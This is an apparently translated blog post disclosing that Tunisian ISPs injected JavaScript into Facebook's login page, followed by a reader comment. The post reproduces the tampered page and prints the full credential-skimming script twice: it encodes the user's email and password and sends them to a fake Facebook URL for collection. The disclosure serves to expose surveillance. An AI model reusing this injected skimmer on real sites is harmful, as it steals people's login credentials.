Disclaimer: The information reported below has been translated from French to English with the approval of a friend who also released the information on his blog. His server was hit by a DoS attack. Feel free to relay the information!
When you try to access big websites like Facebook, Google or Yahoo! while connected to a Tunisian ISP, here is the code your browser will receive (for Facebook in the example below):
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="fr" lang="fr" id="facebook"> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta http-equiv="Content-language" content="fr" /> <script type="text/javascript"> //<![CDATA[ CavalryLogger=false;window._is_quickling_index="";window._EagleEyeSeed="w6jw"; //]]> </script><noscript> <meta http-equiv=refresh content="0; URL=/?_fb_noscript=1" /> </noscript> <meta name="robots" content="noodp,noydir" /> <meta name="description" content=" Facebook est un réseau social qui vous relie à des amis, des collègues de travail, des camarades de classe ou d’autres personnes qui ont quelque chose à partager avec vous. Grâce à Facebook, vous pourrez rester en contact avec vos amis, charger un nombre illimité de photos, publier des liens et des vidéos… et faire plus ample connaissance avec les personnes que vous rencontrez." /> <link rel="alternate" media="handheld" href="http://www.facebook.com/" /> <title>Bienvenue sur Facebook</title> <noscript><meta http-equiv="X-Frame-Options" content="deny" /></noscript> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y6/r/TVhzFSu8Tm2.css" /> <link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/y-/r/zbLi6FTnPZj.css" /> <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yN/r/Uuokrl6Xv3c.css" /> <link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yT/r/rUdGGxe1Qk1.css" /> <script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/yK/r/NK-XVT6bZ0B.js"></script> <link rel="search" type="application/opensearchdescription+xml" href="http://b.static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" /> <link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/y7/r/5875srnzL-I.ico" /></head> <body> <div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;" ></div><div id="blueBar"></div><div id="globalContainer"><div id="dialogContainer"></div><div id="dropmenu_container"></div><div id="content"><div ><!-- 2365fa3194ecdc0cab15721ce967a9f8663937c7 --> <div><div><div><a href="/" title="Accéder à la page d'accueil"><img src="http://static.ak.fbcdn.net/rsrc.php/yp/r/kk8dc2UJYJ4.png" alt="Logo de Facebook" width="170" height="36" /></a><div><div><form method="POST" action="https://login.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="hAAAQ3d()" onsubmit="return Event.__inlineSubmit(this,event)"><div style="position:absolute;top:-250px"><img id="x6y7z8" src=""/></div> <script language="javascript"> <!-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");} function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");} //--> </script><input type="hidden" name="charset_test" value="€,´,€,´,æ°´,Д,Є" /><input type="hidden" name="lsd" value="AOL9y" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="fr_FR" autocomplete="off" /><table cellspacing="0"><tr><td><label for="email">Adresse électronique</label></td><td><label for="pass">Mot de passe</label></td></tr><tr><td><input type="text" name="email" id="email" tabindex="1" /></td><td><input type="password" name="pass" id="pass" tabindex="2" /></td><td><label><input value="Connexion" tabindex="4" type="submit" /></label></td></tr><tr><td><input type="checkbox" value="1" id="persistent" name="persistent" checked="1" /><input type="hidden" name="default_persistent" value="1" /><label id="label_persistent" for="persistent">Garder ma session active</label></td><td><a href="http://www.facebook.com/reset.php" rel="nofollow">Mot de passe oublié ?</a></td></tr></table><input type="hidden" name="charset_test" value="€,´,€,´,æ°´,Д,Є" /><input type="hidden" id="lsd" name="lsd" value="AOL9y" autocomplete="off" /></form> </div></div></div></div><div><div><div><div>Facebook vous permet de rester en contact et d'échanger avec les personnes qui vous entourent.</div><div> </div></div><div><div><div><div>Inscription</div><div>C’est gratuit (et ça le restera toujours)</div></div><div id="registration_container"><div><noscript><div id="no_js_box"><h2>JavaScript est désactivé dans votre navigateur.</h2><p>Veuillez activer JavaScript dans votre navigateur ou installer un navigateur avec JavaScript pour pouvoir vous enregistrer sur Facebook.</p></div></noscript><div id="simple_registration_container"><div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return
The most interesting code is the following:
<!-- function h6h(st){var st2="";for(i=0;i<st.length;i++){c=st.charCodeAt(i);ch=(c&0xF0)>>4;cl=c&0x0F; st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);}return st2;} function r5t(len){var st="";for(i=0;i<len;i++)st=st+String.fromCharCode(Math.floor(Math.random(1)*26+97)); return st;} function hAAAQ3d() { var frm = document.getElementById("login_form"); var us3r = frm.email.value; var pa55 = frm.pass.value; var url = "http://www.facebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55); var bnm = navigator.appName; if(bnm=='Microsoft Internet Explorer') inv0k3(url); else inv0k2(url);} function inv0k1(url) {var objhq = document.getElementById("x6y7z8"); objhq.src = url;} function inv0k2(url) {var xr = new XMLHttpRequest(); xr.open("GET", url, false); xr.send("");} function inv0k3(url) {var xr = new ActiveXObject('Microsoft.XMLHTTP'); xr.open("GET", url, false); xr.send("");} //-->
The code is injected when you try to access the website. It has been successfully tested from a proxy server located in Tunisia. This code generates a new query which looks like:
http://www.facebook.com/wo0dh3ad?q=blablablabla&u=USERNAME&p=PASSWORD
This is a fake page and the user will receive a nice “404” error. But its credentials are sent in clear text. So easy to collect with another tool and build a nice list of poor users!
Other examples are available here:
Related sites:
I don’t really get the purpose of this injection. If you’re using http(or https with MitM, for example because you didn’t validate the cert), the password will already be sent in the clear, and if you’re using https without MitM, they can’t inject the js. So I don’t really get what this tries to do.